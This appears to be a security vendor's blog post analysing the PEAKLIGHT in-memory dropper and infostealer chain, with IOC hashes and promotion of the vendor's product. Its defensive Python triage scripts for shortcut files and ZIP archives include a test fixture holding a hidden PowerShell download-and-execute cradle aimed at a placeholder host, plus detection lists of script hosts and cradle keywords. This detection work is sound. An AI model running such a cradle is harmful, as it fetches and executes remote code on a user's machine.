Mandiant researchers recently published a blog post on a memory-only dropper that uses a multi-stage infection process. The dropper runs entirely in memory and delivers a PowerShell-based downloader that Mandiant tracks as PEAKLIGHT. Mandiant's findings note that this memory-only dropper and downloader was being used to deliver malware-as-a-service infostealers.
Morphisec researchers reviewed the article and tested the published indicators of compromise (IOCs) to understand the impact of the malware on Morphisec's customers. As expected, Morphisec prevented the attack. This validates Morphisec's strength in protecting organizations against sophisticated in-memory attacks like PEAKLIGHT.
Morphisec's Automated Moving Target Defense (AMTD) technology and its prevention mechanisms give early visibility of the techniques adversaries use, which allows faster containment of incidents and improves cyber-resiliency and an organization's ability to recover from attacks.
PEAKLIGHT infection chain and attack flow
Credit: Mandiant
The infection chain starts with a user downloading a malicious ZIP archive that impersonates a pirated movie. The archive contains a malicious LNK (Windows shortcut) file which, when executed, initiates an outbound connection to a URL hosting the next-stage payload.
LNK files are a common tactic threat actors use to trick unsuspecting users into executing malware. A shortcut's name and icon can differ from its real target, so it can be disguised as a legitimate document, media file or program, hiding in plain sight.
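The shortcut lure above is where an analyst first gets a look at the chain, and the fields that give it away (the real target, the command-line arguments, and the window-show mode) are all in the Shell Link binary format. The following is an added triage example, not code from the Morphisec or Mandiant write-ups: it parses the MS-SHLLINK header and StringData fields of a .lnk and flags the traits a "movie" shortcut should never have. The sample shortcut, the script-host list and the argument markers are constructed heuristics, not indicators from this post.

```python
import struct
import uuid

# CLSID every Shell Link header must carry (MS-SHLLINK 2.1)
LNK_CLSID = uuid.UUID("00021401-0000-0000-c000-000000000046")

# LinkFlags bits (MS-SHLLINK 2.1.1) that drive the parse below
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

# StringData fields appear in this fixed order when their flag is set
STRING_FIELDS = (
    (HAS_NAME, "name"),
    (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
)

SW_SHOWMINNOACTIVE = 7  # ShowCommand: window opens minimised and never takes focus

# Analyst heuristics (constructed, not IOCs from the post): hosts a media file
# should never launch, and argument fragments typical of a download cradle.
SCRIPT_HOSTS = ("powershell", "pwsh", "cmd.exe", "mshta", "wscript", "cscript",
                "rundll32", "regsvr32", "forfiles", "conhost", "certutil", "curl")
ARG_MARKERS = ("http://", "https://", "-enc", "iex", "invoke-expression",
               "downloadstring", "frombase64string", "-w hidden", "-nop")


def parse_lnk(data: bytes) -> dict:
    """Parse the ShellLinkHeader and StringData of a .lnk, skipping IDList/LinkInfo by size."""
    if len(data) < 0x4C or struct.unpack_from("<I", data, 0)[0] != 0x4C:
        raise ValueError("bad HeaderSize, not a shell link")
    if uuid.UUID(bytes_le=data[4:20]) != LNK_CLSID:
        raise ValueError("bad LinkCLSID, not a shell link")
    flags = struct.unpack_from("<I", data, 20)[0]
    info = {"flags": flags, "show_command": struct.unpack_from("<I", data, 60)[0]}
    off = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:          # IDListSize (2 bytes) + IDList
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:                    # LinkInfoSize includes itself
        off += struct.unpack_from("<I", data, off)[0]
    for bit, name in STRING_FIELDS:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, off)[0]  # character count, no terminator
        off += 2
        if flags & IS_UNICODE:
            info[name] = data[off:off + 2 * count].decode("utf-16-le")
            off += 2 * count
        else:
            info[name] = data[off:off + count].decode("cp1252", errors="replace")
            off += count
    return info


def triage_lnk(info: dict) -> list:
    """Return the reasons a parsed shortcut looks like a downloader stage (empty list = clean)."""
    reasons = []
    target = " ".join(info.get(k, "") for k in ("relative_path", "name", "icon_location")).lower()
    args = info.get("arguments", "").lower()
    if any(host in target or host in args for host in SCRIPT_HOSTS):
        reasons.append("launches a script host or LOLBin")
    if info["show_command"] == SW_SHOWMINNOACTIVE:
        reasons.append("window opens minimised without focus")
    hits = [m for m in ARG_MARKERS if m in args]
    if hits:
        reasons.append("download/execution markers in arguments: " + ", ".join(hits))
    if len(args) > 200:
        reasons.append(f"unusually long argument string ({len(args)} chars)")
    return reasons


def build_lnk(relative_path: str, arguments: str, show_command: int = 1) -> bytes:
    """Constructed minimal .lnk (header + two Unicode StringData fields) for offline testing."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I", 0x4C) + LNK_CLSID.bytes_le
    # LinkFlags, FileAttributes, three FILETIMEs, FileSize, IconIndex, ShowCommand,
    # HotKey, Reserved1, Reserved2, Reserved3
    header += struct.pack("<IIQQQIIIHHII", flags, 0x20, 0, 0, 0, 0, 0,
                          show_command, 0, 0, 0, 0)

    def string_data(s: str) -> bytes:
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")

    return header + string_data(relative_path) + string_data(arguments)


if __name__ == "__main__":
    # Constructed lure: a "movie" shortcut that really runs cmd -> hidden PowerShell cradle
    lure = build_lnk(r"..\..\..\Windows\System32\cmd.exe",
                     '/c powershell -w hidden -nop -c "iex (irm https://cdn.example/p)"',
                     SW_SHOWMINNOACTIVE)
    for reason in triage_lnk(parse_lnk(lure)):
        print("[!]", reason)
```

Run it against a real shortcut with parse_lnk(open(path, "rb").read()); the parser deliberately skips the LinkTargetIDList and LinkInfo structures by their declared sizes, which is enough to reach the arguments, the field that carries the download cradle in shortcut-based lures.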
Different documented variations of the attack employ living-off-the-land techniques to stay stealthy and abuse content delivery networks (CDNs).
CDN abuse means hosting malicious payloads on legitimate CDN infrastructure. Because CDN domains generally have a good reputation, requests to them pass reputation-based web filtering that would block a known-bad or newly registered attacker domain.
In the second stage, a JavaScript dropper is delivered. On execution it runs an embedded payload, with some variation between documented samples, which delivers the PEAKLIGHT PowerShell downloader onto the system.
The PEAKLIGHT downloader retrieves and executes the final payload (stage 4). These payloads are ZIP archives downloaded from reputable CDNs; when executed, they install the designated infostealer on the compromised system.
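Because the last stage is a plain ZIP fetched from a CDN, a defender who captures it can hash it against the published indicators and look inside without detonating anything. The following is an added example, not Morphisec's or Mandiant's tooling: it computes the SHA-256 of an archive, compares it with the K1.zip hashes listed in this post, and walks the members (recursing into nested ZIPs) to flag executable, script or media-named-but-executable entries. The sample archive, the extension lists and the nesting depth are constructed analyst heuristics; only the two IOC hashes come from the post.

```python
import hashlib
import io
import os
import zipfile

# SHA-256 values of the K1.zip samples listed in this post
KNOWN_IOC_SHA256 = {
    "ead01fc10a3a7c5bef4f37a8137724c290716d07f4f032d5057f2a198834d5d7",
    "8235bd354b95a117a50922b994732cba101815a26a502ab9dc039a533329e2a5",
}

# Member types worth a second look inside a "movie" archive (constructed heuristics)
EXEC_EXTS = {".lnk", ".exe", ".dll", ".scr", ".js", ".jse", ".vbs", ".vbe", ".wsf",
             ".hta", ".ps1", ".bat", ".cmd", ".au3", ".a3x"}
ARCHIVE_EXTS = {".zip", ".rar", ".7z"}
MEDIA_EXTS = {".mp4", ".mkv", ".avi", ".mov", ".mp3"}


def _exts(name: str) -> list:
    """All dotted suffixes of a member name, lower-cased: 'a.mp4.lnk' -> ['.mp4', '.lnk']."""
    base = os.path.basename(name.replace("\\", "/"))
    return ["." + p for p in base.lower().split(".")[1:]]


def triage_archive(data: bytes, iocs=KNOWN_IOC_SHA256, depth=0, max_depth=2) -> dict:
    """Hash the blob, match it against IOCs and inspect members, recursing into nested ZIPs."""
    digest = hashlib.sha256(data).hexdigest()
    report = {"sha256": digest, "ioc_match": digest in iocs, "members": [], "findings": []}
    if not zipfile.is_zipfile(io.BytesIO(data)):
        report["findings"].append("not a ZIP container")
        return report
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for zi in zf.infolist():
            if zi.is_dir():
                continue
            exts = _exts(zi.filename)
            entry = {"name": zi.filename, "size": zi.file_size, "flags": []}
            encrypted = bool(zi.flag_bits & 0x1)   # general-purpose bit 0: encrypted entry
            if exts and exts[-1] in EXEC_EXTS:
                entry["flags"].append("executable/script member")
            if len(exts) >= 2 and exts[-2] in MEDIA_EXTS:
                entry["flags"].append("media name with hidden executable extension")
            if encrypted:
                entry["flags"].append("password protected (hides content from scanners)")
            if exts and exts[-1] in ARCHIVE_EXTS and depth < max_depth and not encrypted:
                entry["nested"] = triage_archive(zf.read(zi), iocs, depth + 1, max_depth)
            report["members"].append(entry)
    if report["ioc_match"]:
        report["findings"].append("SHA-256 matches a published PEAKLIGHT payload archive")
    if any(m["flags"] for m in report["members"]):
        report["findings"].append("archive carries executable or disguised members")
    return report


def build_sample_zip(entries) -> bytes:
    """Constructed in-memory ZIP from (name, bytes) pairs, for offline testing only."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, content in entries:
            zf.writestr(name, content)
    return buf.getvalue()


if __name__ == "__main__":
    # Constructed lure: a "movie" archive holding a shortcut plus a nested payload archive
    inner = build_sample_zip([("Setup.exe", b"MZ" + b"\0" * 62)])
    outer = build_sample_zip([("Movie.2024.1080p.mp4.lnk", b"L\0\0\0"),
                              ("K1.zip", inner),
                              ("readme.txt", b"enjoy")])
    report = triage_archive(outer)
    print(report["sha256"], "IOC match:", report["ioc_match"])
    for m in report["members"]:
        print(m["name"], m["flags"], "nested" if "nested" in m else "")
    for f in report["findings"]:
        print("[!]", f)
```

Feed it a real capture with triage_archive(open(path, "rb").read()); the IOC set can be extended with any further hashes you collect, and the recursion limit keeps a deliberately nested archive from exhausting the analyst box.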
Morphisec analyzed the archive files; the details follow.
Archive: K1.zip
SHA-256: ead01fc10a3a7c5bef4f37a8137724c290716d07f4f032d5057f2a198834d5d7
SHA-256: 8235bd354b95a117a50922b994732cba101815a26a502ab9dc039a533329e2a5
VirusTotal analysis shows the K1.zip payload, under two different hashes, first seen around April and May 2024.
Static engines showed a very low detection rate until 22 August 2024, when detections rose to 31. Notably, this was shortly before Mandiant released its PEAKLIGHT findings.
The low detection count across NGAV/EDR vendors from April to August 2024 shows that these samples could have passed the signature-based defenses of incumbent solutions for months, and that the techniques used are complex and evasive.
Morphisec's native AMTD-based protection introduces dynamism while applications load at runtime, and so needed no prior knowledge of the attack to prevent it.
Our test of the archive payloads, and the resulting prevention, validates the strength of AMTD-based protection, as shown in the prevention log of the final payload archive below.
We found similar prevention logs in several customer environments globally. One of these customers operates in the healthcare manufacturing sector with offices worldwide; one of its locations was targeted by this group.
The campaign was observed from May 2024 and was designed to deliver sophisticated infostealers. Morphisec prevented it at the stage where an AutoIt script was used to deliver the final payload.
This again validates Morphisec's ability to prevent unknown attacks: in May 2024 the campaign was not widely known and had relatively low detections in VirusTotal static analysis.
Conclusion
Morphisec's AMTD-based approach supports the defense-in-depth strategy organizations need for a hardened endpoint security posture. The PEAKLIGHT PowerShell downloader is an example of the complex, evasive attacks adversary groups now build to slip past detection-based solutions.
Morphisec's AMTD complements existing NGAV/EDR solutions by denying attackers the environment they need to run these attacks. This prevention-focused approach requires no prior knowledge of the attack and is signatureless, reducing the security team's operational overhead.
Combining AMTD with Adaptive Exposure Management gives organizations visibility into exposed attack surfaces and, by extension, helps build a credible anti-ransomware assurance model.
See Morphisec in action — book a demo today.